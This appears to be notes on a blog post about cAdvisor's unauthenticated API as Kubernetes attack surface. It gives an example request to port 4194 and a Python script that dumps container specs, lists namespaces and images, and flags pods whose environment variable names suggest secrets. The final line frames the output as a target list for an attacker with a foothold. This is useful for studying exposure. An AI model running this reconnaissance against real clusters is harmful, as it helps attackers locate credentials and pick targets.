https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/

What do you get?

Information disclosure about the running containers: names, images, labels (on Kubernetes the io.kubernetes.* pod and namespace labels), resource limits and live usage.

Example request to hit the API and dump data:

http://1.2.3.4:4194/api/v2.0/spec?recursive=true
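As an added example (my code, not from the post), a parser that turns that recursive spec dump into a container inventory: image, Kubernetes pod/namespace/container from the labels, and the names of environment variables that look like secrets. Assumptions: the field names follow cAdvisor's v2 ContainerSpec JSON (image, labels, envs, aliases) and the io.kubernetes.* label keys are the ones the Docker runtime attaches to Kubernetes containers; the sample response is constructed.

```python
"""Turn a cAdvisor /api/v2.0/spec?recursive=true dump into a container inventory.
Added example, not from the post; stdlib only.  Assumptions: field names follow
cAdvisor's v2 ContainerSpec JSON (image, labels, envs, aliases), and the
io.kubernetes.* label keys are the ones the Docker runtime puts on Kubernetes
containers.  SAMPLE_SPEC below is constructed."""
import json
import re
import urllib.request

SENSITIVE_ENV = re.compile(r"(?i)(pass|secret|token|key|credential)")


def fetch_spec(host, port=4194, timeout=10):
    url = f"http://{host}:{port}/api/v2.0/spec?recursive=true"
    with urllib.request.urlopen(url, timeout=timeout) as r:
        return json.load(r)


def inventory(spec):
    """One record per cgroup path: image, Kubernetes pod/namespace/container from the
    labels, and the names of any environment variables that look like secrets."""
    rows = []
    for path, c in spec.items():
        labels = c.get("labels") or {}
        envs = c.get("envs") or {}
        rows.append({
            "path": path,
            "image": c.get("image", ""),
            "namespace": labels.get("io.kubernetes.pod.namespace", ""),
            "pod": labels.get("io.kubernetes.pod.name", ""),
            "container": labels.get("io.kubernetes.container.name", ""),
            "sensitive_envs": sorted(k for k in envs if SENSITIVE_ENV.search(k)),
        })
    return sorted(rows, key=lambda r: r["path"])


def summarize(rows):
    """What an unauthenticated reader learns: namespaces, images, and pods whose
    environment variable names suggest credentials are present in the dump."""
    return {
        "namespaces": sorted({r["namespace"] for r in rows if r["namespace"]}),
        "images": sorted({r["image"] for r in rows if r["image"]}),
        "leaky_pods": [r["pod"] or r["path"] for r in rows if r["sensitive_envs"]],
    }


SAMPLE_SPEC = {
    "/": {"has_cpu": True, "has_memory": True},
    "/kubepods/burstable/pod1111/aaaa": {
        "aliases": ["k8s_api_api-7c9d-x2kq_prod_1111_0", "aaaa"],
        "image": "registry.internal/api:1.4.2",
        "labels": {"io.kubernetes.pod.namespace": "prod",
                   "io.kubernetes.pod.name": "api-7c9d-x2kq",
                   "io.kubernetes.container.name": "api"},
        "envs": {"DB_PASSWORD": "constructed-value", "PORT": "8080"},
    },
    "/kubepods/besteffort/pod2222/bbbb": {
        "aliases": ["k8s_POD_kube-dns-5f_kube-system_2222_0", "bbbb"],
        "image": "k8s.gcr.io/pause:3.1",
        "labels": {"io.kubernetes.pod.namespace": "kube-system",
                   "io.kubernetes.pod.name": "kube-dns-5f",
                   "io.kubernetes.container.name": "POD"},
    },
}

if __name__ == "__main__":
    import sys
    spec = fetch_spec(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_SPEC
    print(json.dumps(summarize(inventory(spec)), indent=2))
```

Whether `envs` is populated at all depends on how cAdvisor was started; when it is, the variable names alone tell you which pods are worth going after once you have any foothold.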

Screenshots


